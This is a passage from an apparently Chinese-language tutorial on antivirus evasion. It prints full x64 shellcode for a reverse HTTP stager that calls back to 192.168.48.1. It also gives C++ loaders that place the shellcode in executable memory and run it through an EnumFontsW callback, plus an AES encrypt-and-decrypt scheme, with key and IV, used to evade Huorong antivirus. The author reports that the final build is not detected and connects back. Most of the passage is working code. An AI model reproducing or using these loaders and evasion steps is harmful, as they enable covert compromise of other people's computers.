x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";int ShellcodeSize = sizeof(shellcode);// 使用标准 VirtualAlloc 而非 lazy_importerchar* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);return 0;
}

测试，可以正常上线，说明代码没问题

打包出来，火绒直接秒

2、同样，这里进行aes加密处理，先使用下面c++脚本进行加密

我这里使用了网上的加密库：
GitHub - xf555er/ShellcodeEncryption: 对shellcode进行xor、aes加解密来绕过杀毒软件的静态查杀

#include <iostream>
#include "Shellcode加密库.h"
using namespace std;int main() {unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";//生成随机16位的key值和iv值srand(time(0)); // initialize random seedstring g_key = random_string(16);string g_iv = random_string(16);cout << "key值: " << g_key << endl;cout << "iv值: " << g_iv <<endl;//将shellcode字节数组转换成十六进制字符串size_t bufLen = sizeof(buf) / sizeof(unsigned char) - 1;string OriginalShellcode = toHexString(buf, bufLen);cout << "未加密的shellcode: " << OriginalShellcode << endl;//对shellcode字符串进行加密string EncryptShellcode = EncryptionAES(OriginalShellcode,g_key.c_str(),g_iv.c_str());cout << "加密后的shellcode: " << EncryptShellcode << endl;//对加密后的shellcode字符串进行解密string DecryptShellcode = DecryptionAES(EncryptShellcode, g_key.c_str(), g_iv.c_str());cout << "解密后的shellcode: " << DecryptShellcode << endl;return 0;
}

记录加密结果

3、改造刚才的“回调函数”加载器，加入解密代码进行改造

#define _CRT_SECURE_NO_DEPRECATE
#include <iostream>
#include <windows.h>
#include "Shellcode加密库.h"#define BUF_SIZE 4096using namespace std;
char g_key[17] = "OeQ)ph(:u#$_Rr<2";   //填写key密钥
char g_iv[17] = "0(/IaOQ=>B&ETYDT";    //定义iv向量void main(int argc, char* argv[])
{// 加密后的shellcode（省略中间部分，实际中保留）string buf = "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"; // 略去过长部分// 解密shellcodestring strbuf = DecryptionAES(buf, g_key, (char*)g_iv);// 将解密的shellcode转换为字节数组char* p = (char*)strbuf.c_str();unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));for (size_t i = 0; i < strbuf.length() / 2; i++) {sscanf(p, "%02x", &shellcode[i]);p += 2;}int ShellcodeSize = strbuf.length() / 2;printf("Decrypted buffer:\n");for (int i = 0; i < ShellcodeSize; i++) {printf("\\x%02x", shellcode[i]);}// 加载shellcodechar* orig_buffer = (char*)VirtualAlloc(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);// 执行shellcodeEnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
}

测试，成功上线，代码没问题

打包编译出来，火绒不再查杀，可以正常上线！

结尾

免杀效果通常受多方面影响，没有哪一种技术或者手段能够通吃，通常需要多种手段结合才能最终实现免杀；其次，实战中面临的环境也不一样，不同的杀软效果也不一样，具体问题还需具体分析。本系列文章以技术的实现为主，仅拿火绒演示，以此表达一项技术的有效性。